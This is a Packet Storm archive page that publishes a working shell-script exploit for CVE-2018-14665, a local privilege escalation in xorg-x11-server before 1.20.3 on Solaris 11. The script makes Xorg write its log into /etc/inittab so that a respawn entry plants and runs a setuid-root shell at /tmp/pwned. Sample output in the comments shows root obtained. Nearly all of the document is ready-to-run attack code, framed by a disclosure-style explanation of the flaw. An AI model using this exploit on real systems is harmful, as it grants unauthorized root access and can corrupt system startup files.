exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xorg-x11-server Local Privilege Escalation

xorg-x11-server Local Privilege Escalation
Posted Jan 14, 2019
Authored by Marco Ivaldi

xorg-x11-server versions prior to 1.20.3 Solaris 11 inittab local privilege escalation exploit.

tags | exploit, local
systems | solaris
advisories | CVE-2018-14665
SHA-256 | f395fa6075c97d0f6a5281e7569a3262f4c8a507bf9f6ed087f0ecc2779560ef

xorg-x11-server Local Privilege Escalation

Change Mirror Download
#!/bin/sh

# Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab)
# Date: 2018-11-25
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.x.org/
# Version: xorg-x11-server 1.19.0 - 1.20.2
# Tested on: Oracle Solaris 11.4
# CVE : CVE-2018-14665

#
# raptor_solgasm - xorg-x11-server LPE via Solaris inittab
# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# "In video games, this is what they call respawning" -- Nick Sax
#
# This exploit targets /etc/inittab in order to escalate privileges to root
# on Solaris 11 (no need to be connected to a physical console). Messing with
# inittab is considerably dangerous and you may trash your system, however the
# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't
# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING!
#
# See also:
# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_solgasm
# raptor@stalker:~$ ./raptor_solgasm
# [...]
# Now please be patient for a few minutes...
# [...]
# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab
# -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab
# -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old
# -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned
# root@stalker:/etc# id
# uid=0(root) gid=0(root)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]
# Oracle Solaris 11 SPARC [untested]
#

echo "raptor_solgasm - xorg-x11-server LPE via Solaris inittab"
echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"

# prepare the payload
cat << EOF > /tmp/solgasm
cp /bin/zsh /tmp/pwned # fallback in case gcc is not available
echo "main(){setuid(0);setgid(0);system(\"/bin/bash\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /tmp/pwned
chmod 4777 /tmp/pwned
EOF
chmod +x /tmp/solgasm

# trigger the bug
PWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1)
cd /etc
Xorg -fp "${PWN}::respawn:/tmp/solgasm" -logfile inittab :1 &
sleep 5
pkill Xorg

# run the setuid shell
echo
echo "Now please be patient for a few minutes..."
echo
until [ -u /tmp/pwned ]; do sleep 1; done
echo "To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab"
ls -l /etc/inittab*
ls -l /tmp/pwned
sleep 1
/tmp/pwned

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close